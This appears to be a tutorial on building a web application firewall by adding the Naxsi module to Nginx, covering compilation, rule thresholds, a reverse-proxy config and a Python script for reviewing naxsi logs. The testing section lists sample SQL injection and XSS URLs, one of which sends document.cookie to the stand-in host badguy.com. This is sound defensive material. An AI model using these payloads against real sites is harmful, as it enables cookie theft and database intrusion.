
Building a WAF on Linux: using Naxsi with Nginx to set up a Web Application Firewall (WAF) against XSS and injection

贺海
2023-12-01

1. Overview

Naxsi is an open-source, high-performance Nginx web application firewall (WAF) module with low-maintenance rules. Its main goal is to harden web applications against SQL injection, cross-site scripting, cross-site request forgery, and local and remote file inclusion vulnerabilities.

Project page: https://github.com/nbs-system/naxsi

2. Download Naxsi

cd /data0/software/
wget https://github.com/nbs-system/naxsi/archive/master.zip
mv master.zip naxsi-master.zip
unzip naxsi-master.zip

3. Recompile nginx with the naxsi module added

cd ngx_openresty-1.4.3.6
./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_realip_module --add-module=/data0/software/naxsi-master/naxsi_src/
gmake
gmake install
cd ../

4. Copy Naxsi's core rule set

cp /data0/software/naxsi-master/naxsi_config/naxsi_core.rules /usr/local/webserver/nginx/conf/

Define the security rules for one virtual host

vi /usr/local/webserver/nginx/conf/mysite.rules

with the following contents:

#LearningMode; #Enables learning mode
SecRulesEnabled;
#SecRulesDisabled;
DeniedUrl "/RequestDenied";

## check rules
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;

Edit nginx.conf

vi /usr/local/webserver/nginx/conf/nginx.conf

Add the following line inside the http block

include /usr/local/webserver/nginx/conf/naxsi_core.rules;

The complete nginx.conf is as follows

user www www;
worker_processes 8;
error_log /data1/logs/nginx_error.log crit;
pid /usr/local/webserver/nginx/nginx.pid;

#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535;

events
{
    use epoll;
    worker_connections 65535;
}

http
{
    include mime.types;
    include /usr/local/webserver/nginx/conf/naxsi_core.rules;
    default_type application/octet-stream;
    #charset gb2312;

    server_names_hash_bucket_size 128;
    client_header_buffer_size 32k;
    large_client_header_buffers 4 32k;
    client_max_body_size 8m;

    sendfile on;
    tcp_nopush on;
    keepalive_timeout 60;
    tcp_nodelay on;
    server_tokens off;

    fastcgi_connect_timeout 300;
    fastcgi_send_timeout 300;
    fastcgi_read_timeout 300;
    fastcgi_buffer_size 64k;
    fastcgi_buffers 4 64k;
    fastcgi_busy_buffers_size 128k;
    fastcgi_temp_file_write_size 128k;

    gzip on;
    gzip_min_length 1k;
    gzip_buffers 4 16k;
    gzip_http_version 1.0;
    gzip_comp_level 2;
    gzip_types text/plain application/x-javascript text/css application/xml;
    gzip_vary on;

    #limit_zone crawler $binary_remote_addr 10m;

    log_format access '$remote_addr - $remote_user [$time_local] "$request" '
                      '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
                      '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

    log_format wwwlogs '$remote_addr - $remote_user [$time_local] "$request" '
                       '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
                       '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

    server
    {
        listen 80;
        server_name blog.abc.com;
        index index.html index.htm index.php;
        root /data0/htdocs/blog;
        #limit_conn crawler 20;

        # the original pattern had a stray "?" after (php|php5), which also matched URIs ending in a bare dot
        location ~ .*\.(php|php5)$
        {
            #fastcgi_pass unix:/tmp/php-cgi.sock;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fcgi.conf;
        }

        location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
        {
            expires 30d;
        }

        location ~ .*\.(js|css)$
        {
            expires 1h;
        }

        access_log /data1/logs/access.log access;
    }

    # WAF front end: public requests for www.abc.com pass through the naxsi rules
    # and are then proxied to the backend server listening on the loopback address below
    server
    {
        listen 80;
        server_name www.abc.com;
        index index.html index.htm index.php;
        root /data0/htdocs/www;

        location / {
            include /usr/local/webserver/nginx/conf/mysite.rules;
            proxy_pass http://127.0.0.1/;
            proxy_set_header Host www.abc.com;
        }

        # naxsi sends blocked requests here (DeniedUrl in mysite.rules)
        location /RequestDenied {
            return 403;
        }

        access_log /data1/logs/mysite.log wwwlogs;
        error_log /data1/logs/mysite_nginx_error.log debug;
    }

    # backend: reachable only on 127.0.0.1, i.e. through the WAF server above
    server
    {
        listen 127.0.0.1:80;
        server_name www.abc.com;
        index index.html index.htm index.php;
        root /data0/htdocs/www;

        location ~ .*\.(php|php5)$
        {
            #fastcgi_pass unix:/tmp/php-cgi.sock;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fcgi.conf;
        }

        access_log /data1/logs/wwwlogs.log wwwlogs;
    }

    server
    {
        listen 80;
        server_name status.blog.abc.com;

        location / {
            stub_status on;
            access_log off;
        }
    }
}

5. Start nginx

killall -9 nginx
/usr/local/webserver/nginx/sbin/nginx

6. Testing

http://www.abc.com/test.php?name=40/**/and/**/1=1  rejected: contains a conditional injection

http://www.abc.com/test.php?name=%28%29  rejected: special characters

http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E  rejected: parameter contains injected script

http://www.abc.com/test.php?title=meta%20http-equiv=%22refresh%22%20content=%220;%22  rejected

The requests filtered by naxsi can be reviewed in /data1/logs/mysite_nginx_error.log
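To make those log entries easier to review, here is an added Python script (not part of the original post or of the naxsi project) that pulls the NAXSI_FMT entries out of the error log and re-applies the CheckRule thresholds from mysite.rules to each request's scores. The log lines it runs on are constructed samples; the addresses, rule ids and scores in them are assumed for illustration.

```python
import re
from urllib.parse import parse_qs

# Thresholds copied from mysite.rules above (CheckRule "$SQL >= 8" BLOCK; and so on).
CHECK_RULES = {"$SQL": 8, "$RFI": 8, "$TRAVERSAL": 4, "$EVADE": 4, "$XSS": 8}
NAXSI_RE = re.compile(r"NAXSI_FMT: ([^ ,]+)")  # the entry naxsi writes to nginx's error_log

# Constructed sample entries in naxsi's NAXSI_FMT layout; the addresses, rule ids
# and scores are made up for illustration and were not copied from a real server.
SAMPLE_LOG = """\
2023/12/01 10:00:01 [error] 1234#0: *1 NAXSI_FMT: ip=203.0.113.5&server=www.abc.com&uri=/test.php&learning=0&vers=0.53&total_processed=10&total_blocked=1&block=1&cscore0=$SQL&score0=8&zone0=ARGS&id0=1003&var_name0=name&zone1=ARGS&id1=1009&var_name1=name, client: 203.0.113.5, server: www.abc.com, request: "GET /test.php?name=40/**/and/**/1=1 HTTP/1.1"
2023/12/01 10:00:02 [error] 1234#0: *2 NAXSI_FMT: ip=203.0.113.5&server=www.abc.com&uri=/test.php&learning=1&vers=0.53&total_processed=11&total_blocked=1&block=0&cscore0=$XSS&score0=4&zone0=ARGS&id0=1302&var_name0=title, client: 203.0.113.5, server: www.abc.com, request: "GET /test.php?title=%3Cb HTTP/1.1"
2023/12/01 10:00:03 [error] 1234#0: *3 NAXSI_FMT: ip=198.51.100.7&server=www.abc.com&uri=/test.php&learning=0&vers=0.53&total_processed=12&total_blocked=2&block=1&cscore0=$XSS&score0=8&cscore1=$SQL&score1=4&zone0=ARGS&id0=1302&var_name0=term&zone1=ARGS&id1=1303&var_name1=term, client: 198.51.100.7, server: www.abc.com, request: "GET /test.php?term=%3Cscript%3E HTTP/1.1"
2023/12/01 10:00:04 [notice] 1234#0: signal process started
"""

def parse_naxsi_line(line):
    """Return the key/value fields of one NAXSI_FMT entry, or None for any other log line."""
    m = NAXSI_RE.search(line)
    return {k: v[0] for k, v in parse_qs(m.group(1)).items()} if m else None

def indexed(fields, prefix):  # values of prefix0, prefix1, ... in order (naxsi numbers repeated keys)
    vals = []
    while f"{prefix}{len(vals)}" in fields:
        vals.append(fields[f"{prefix}{len(vals)}"])
    return vals

def scores_of(fields):  # pair cscoreN with scoreN -> {"$SQL": 8, "$XSS": 4, ...}
    return {n: int(s) for n, s in zip(indexed(fields, "cscore"), indexed(fields, "score"))}

def triggered_rules(scores):
    """CheckRule names whose threshold these scores reach: the same test naxsi applies for BLOCK."""
    return [name for name, limit in CHECK_RULES.items() if scores.get(name, 0) >= limit]

def analyze(log_text):
    """One summary dict per NAXSI_FMT entry; lines without a naxsi entry are skipped."""
    out = []
    for f in filter(None, map(parse_naxsi_line, log_text.splitlines())):
        scores = scores_of(f)
        out.append({"ip": f["ip"], "uri": f["uri"], "scores": scores,
                    "rule_ids": [int(x) for x in indexed(f, "id")],
                    "learning": f["learning"] == "1", "blocked": f["block"] == "1",
                    "triggered": triggered_rules(scores)})
    return out

if __name__ == "__main__":
    for r in analyze(SAMPLE_LOG):
        verdict = ("BLOCK on " + ",".join(r["triggered"])) if r["triggered"] else "below thresholds"
        print(f"{r['ip']} {r['uri']} scores={r['scores']} ids={r['rule_ids']} -> {verdict}" + (" (learning mode: logged, not enforced)" if r["learning"] else ""))
```

Entries with learning=1 come from LearningMode, where naxsi logs matches but does not block, so a request whose scores are below every threshold can still appear there.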
